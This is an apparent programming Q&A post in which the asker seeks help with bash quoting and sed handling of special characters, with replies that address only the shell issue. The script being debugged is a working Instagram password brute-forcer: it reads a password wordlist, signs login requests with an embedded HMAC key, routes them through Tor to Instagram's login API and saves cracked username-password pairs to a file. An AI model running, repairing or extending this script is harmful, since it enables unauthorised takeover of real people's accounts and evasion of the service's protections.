# special charecters ilke ! # @ make problem while using sed to go the next line in a file

Tags: bash, sed

I'm trying this bash script that uses a for-loop and sed to go through each line of the file and send it to a url. the script works fine while using words like: tst244 or anothersample but failes to work properly and when the line has words like: test-1!@# or sample\34143*9.

this is my code:

```bsh
 for pass in $(sed -n ''$startline','$endline'p' $wl_pass); do
```

this is the output I get while avoiding charecters (I didn't include the printing part of the code to make it more clear):

```
Sending (78/100): "01012011"
Sending (79/100): "69696969"
Sending (80/100): "december"
Sending (81/100): "11223344"
Sending (82/100): "godzilla"
Sending (83/100): "airborne"
Sending (84/100): "lifehack"
Sending (85/100): "brooklyn"
Sending (86/100): "platinum"
```

output with charecters:

```
Sending (285/68814): "test&0525"
Sending (286/68814): "test 0079770525"
Sending (287/68814): "test 007"
Sending (288/68814): "test 525"
Sending (289/68814): "TEST007977"
Sending (290/68814): "TeSt0525"
Sending (291/366): "68814"
Sending (test_0079770525/): ""
Sending (292/367): "68814"
Sending (test_007/): ""
Sending (293/368): "68814"
Sending (test_525/): ""
```

full code for the part that uses these words:

```bsh
while [ $counter -lt $turn ]; do

IFS=$'\n'
for pass in $(sed -n ''$startline','$endline'p' $wl_pass); do
count_pass=$(wc -l $wl_pass | cut -d " " -f1)
header='Connection: "close", "Accept": "*/*", "Content-type": "application/x-www-form-urlencoded; charset=UTF-8", "Cookie2": "$Version=1" "Accept-Language": "en-US", "User-Agent": "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"'

data='{"phone_id":"'$phone'", "_csrftoken":"'$var2'", "username":"'$user'", "guid":"'$guid'", "device_id":"'$device'", "password":"'$pass'", "login_attempt_count":"0"}'
ig_sig="4f8732eb9ba7d1c8e8897a75d6474d4eb3f5279137431b2aafb71fafe2abe178"
IFS=$'\n'
countpass=$(grep -n -x "$pass" "$wl_pass" | cut -d ":" -f1)
hmac=$(echo -n "$data" | openssl dgst -sha256 -hmac "${ig_sig}" | cut -d " " -f2)
useragent='User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"'

let counter++
printf "\e[1;77mTrying pass (%s/%s)\e[0m: \"%s\"\n" $countpass $count_pass $pass

{(trap '' SIGINT && var=$(curl --socks5-hostname 127.0.0.1:9051 -d "ig_sig_key_version=4&signed_body=$hmac.$data" -s --user-agent 'User-Agent: "Instagram 10.26.0 Android (18/4.3; 320dpi; 720x1280; Xiaomi; HM 1SW; armani; qcom; en_US)"' -w "\n%{http_code}\n" -H "$header" "https://i.instagram.com/api/v1/accounts/login/" | grep -o "logged_in_user\|challenge\|many tries\|Please wait" | uniq ); if [[ $var == "challenge" ]]; then printf "\e[1;92m \n [*] Password Found: %s\n [*] Challenge required\n" $pass; printf "Username: %s, Password: %s\n" $user $pass >> found.instainsane ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.instainsane \n\e[0m"; rm -rf nottested.lst; kill -1 $$ > /dev/null 2>&1  ; elif [[ $var == "logged_in_user" ]]; then printf "\e[1;92m \n [*] Password Found: %s\n" $pass; printf "Username: %s, Password: %s\n" $user $pass >> found.instainsane ; printf "\e[1;92m [*] Saved:\e[0m\e[1;77m found.instainsane \n\e[0m"; rm -rf nottested.lst; kill -1 $$  > /dev/null 2>&1 ; elif [[ $var == "Please wait" ]]; then echo $pass >> nottested.lst ; elif [[ $var == "" ]]; then echo $pass >> nottested.lst ; fi; ) } & done; pid1=$! ; #;wait $!;

let startline+=20
let endline+=20

done

}
```

the printing part of the code:

```bsh
count_pass=$(wc -l $wl_pass | cut -d " " -f1)
countpass=$(grep -n -x "$pass" "$wl_pass" | cut -d ":" -f1)
printf "\e[1;77mTrying pass (%s/%s)\e[0m: \"%s\"\n" $countpass $count_pass $pass
```

Comment: at least that unquoted command substitution would mean that if the sed command outputs anything that's filename glob matching existing files, you'd get those matching filenames. But without seeing the actual script, it's hard to all the stuff that might go wrong there. Can you [edit] your question to show a small sample file that shows the problem, and the matching script?

Comment: I’ll do it right now.

Comment: Add these settings in your bash code and rerun: `set+H;set -f;set -u`

Answer (score 0):

The sed statement is better using double quotes where the use of variables requires it, and to prevent bash interpreting the exclamation, and not expanding backslashes, you can change to using read -r, something like this:

```
while read -r pass do
    #... code here ...
done < <(sed -n "$startline,$endline"'{s/!/\x21/g;p}' "$wl_pass")
```

using `printf` or `echo -e` with $pass inside the loop should bring back the exclamation marks

Comment: Thanks but it didn’t work